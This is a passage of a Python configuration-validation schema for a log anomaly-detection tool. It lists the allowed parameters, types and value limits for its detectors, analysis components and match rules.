'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventTypeDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'id_path_list': {'type': 'list', 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True}, 'min_num_vals': {'type': 'integer', 'min': 1}, 'max_num_vals': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_num_vals', 1000]}, 'save_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SlidingEventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'set_upper_limit': {'type': ['integer', 'float'], 'min': 0}, 'local_maximum_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['LinearNumericBinDefinition'], 'required': True}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeBinDefinition'], 'required': True}, 'modulo_value': {'type': ['integer', 'float'], 'required': True, 'min': 0.000001}, 'time_unit': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['HistogramAnalysis'], 'required': True}, 'histogram_defs': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'required': True}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathDependentHistogramAnalysis'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'bin_definition': {'type': 'string', 'required': True, 'empty': False}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchFilter'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'value_list': { 'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueAverageChangeDetector'], 'required': True}, 'timestamp_path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'min_bin_elements': {'type': 'integer', 'required': True, 'min': 1}, 'min_bin_time': {'type': 'integer', 'required': True, 'min': 1}, 'debug_mode': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'avg_factor': {'type': ['integer', 'float'], 'nullable': True, 'min': 0}, 'var_factor': {'type': ['integer', 'float'], 'nullable': True, 'min': 0}, 'learn_mode': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueStreamWriter'], 'required': True}, 'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'separator': {'type': 'string', 'required': True}, 'missing_value_string': {'type': 'string', 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MissingMatchPathListValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'combine_values': {'type': 'boolean'}, 'check_interval': {'type': 'integer', 'min': 1}, 'realert_interval': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['check_interval', 3600]}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchIdValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'id_path_list': {'type': 'list', 'required': True}, 'min_allowed_time_diff': {'type': 'float', 'required': True, 'min': 0.01}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NewMatchPathValueDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ParserCount'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'report_interval': {'type': 'integer', 'min': 1}, 'labels': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'split_reports_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventGenerationMatchAction'], 'required': True}, 'event_type': {'type': 'string', 'required': True}, 'event_message': {'type': 'string', 'required': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AtomFilterMatchAction'], 'required': True}, # this is optional on purpose. If not used, the default atom_filter is used. 'subhandler_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'stop_when_handled_flag': {'type': 'boolean'}, 'delete_components': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'], 'required': True}, 'sub_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentDelegatedMatchRule'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'rule_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'string'}, 'required': True}, 'default_rule': {'type': 'string', 'nullable': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['NegationMatchRule'], 'required': True}, 'sub_rule': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathExistsMatchRule', 'IPv4InRFC1918MatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value': {'type': ['boolean', 'float', 'integer', 'string'], 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueListMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value_list': {'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'upper_limit': {'type': ['integer', 'float'], 'required': True, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StringRegexMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'regex': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'upper_limit': { 'type': ['integer', 'float'], 'required': True, 'min': 0, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': { 'type': ['integer', 'float'], 'min': 0}}, 'required': True}, 'default_limit': {'type': 'list', 'schema': {'type': 'integer', 'min': 0}, 'nullable': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['DebugMatchRule', 'DebugHistoryMatchRule'], 'required': True}, 'debug_mode': {'type': 'boolean'}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationDetector'], 'required': True}, 'parallel_check_count': {'type': 'integer', 'required': True, 'min': 1}, 'record_count_before_event': {'type': 'integer', 'min': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'use_path_match': {'type': 'boolean'}, 'use_value_match': {'type': 'boolean'}, 'min_rule_attributes': {'type': 'integer', 'min': 1}, 'max_rule_attributes': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_rule_attributes', 1]}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationViolationDetector'], 'required': True}, 'ruleset': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'type': {'type': 'string', 'allowed': ['CorrelationRule'], 'required': True}, 'rule_id': {'type': 'string', 'required': True, 'empty': False}, 'min_time_delta': {'type': 'integer', 'required': True, 'min': 1}, 'max_time_delta': {'type': 'integer', 'required': True, 'min': 1, 'bigger_than_or_equal': ['min_time_delta', None]}, 'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'nullable': True}, 'max_violations': {'type': 'integer', 'min': 1} }, { 'type': {'type': 'string', 'allowed': ['EventClassSelector'], 'required': True}, 'action_id': {'type': 'string', 'required': True, 'empty': False}, 'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimestampsUnsortedDetector'], 'required': True}, 'exit_on_error_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableCorrelationDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'disc_div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_steps_create_new_rules': {'type': 'integer', 'min': 1}, 'num_upd_until_validation': {'type': 'integer', 'min': 1}, 'num_end_learning_phase': {'type': 'integer', 'min': 1}, 'check_cor_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'check_cor_prob_thres': {'type': 'float', 'min': 0.000001}, 'check_cor_num_thres': {'type': 'integer', 'min': 1}, 'min_values_cors_thres': {'type': 'integer', 'min': 1}, 'new_vals_alarm_thres': {'type': 'float', 'min': 0.000001}, 'num_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist']}, 'alpha_chisquare_test': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'max_dist_rule_distr': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True}, 'intersect_presel_meth': {'type': 'boolean'}, 'percentage_random_cors': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_vals_sim_tresh': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'exclude_due_distr_lower_limit': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_distr_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True}, 'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'coverVals', 'distinctDistr']}, 'nullable': True}, 'validate_cor_cover_vals_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'validate_cor_distinct_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableTypeDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS']}, 'gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'sim_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'indicator_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'num_update_unq': {'type': 'integer', 'min': 1}, 'num_s_gof_values': {'type': 'integer', 'min': 1}, 'num_s_gof_bt': {'type': 'integer', 'min': 1}, 'num_d_bt': {'type': 'integer', 'min': 1}, 'num_pause_discrete': {'type': 'integer', 'min': 0}, 'num_pause_others': {'type': 'integer', 'min': 0}, 'test_gof_int': {'type': 'boolean'}, 'num_stop_update': {'type': 'boolean'}, 'silence_output_without_confidence': {'type': 'boolean'}, 'silence_output_except_indicator': {'type': 'boolean'}, 'num_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_update_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_var_type_considered_ind': {'type': 'integer', 'min': 1}, 'num_stat_stop_update': {'type': 'integer', 'min': 1}, 'num_updates_until_var_reduction': {'type': 'integer', 'min': 0}, 'var_reduction_thres': {'type': 'float'}, 'num_skipped_ind_for_weights': {'type': 'integer', 'min': 0}, 'num_ind_for_weights': {'type': 'integer', 'min': 1}, 'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi']}, 'use_empiric_distr': {'type': 'boolean'}, 'range_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax']}, 'range_threshold': {'type': 'float', 'min': 0.000001}, 'range_limits_factor': {'type': 'float', 'min': 0.000001}, 'num_reinit_range': {'type': 'integer', 'min': 0}, 'dw_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'save_statistics': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathValueTimeIntervalDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'time_period_length': {'type': 'integer', 'min': 1}, 'max_time_diff': {'type': 'integer', 'min': 1}, 'num_reduce_time_list': {'type': 'integer', 'min': 1}, 'allow_missing_values': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathArimaDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'num_init': {'type': 'integer', 'min': 1}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 'alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TSAArimaDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'waiting_time': {'type': 'integer', 'min': 1}, 'num_sections_waiting_time': {'type': 'integer', 'min': 1}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'acf_pause_interval_percentage': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_auto_pause_interval': {'type': 'boolean'}, 'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1}, 'build_sum_over_values': {'type': 'boolean'}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'num_division_time_step': {'type': 'integer', 'min': 1}, 'alpha': {'type': 'float', 'min': 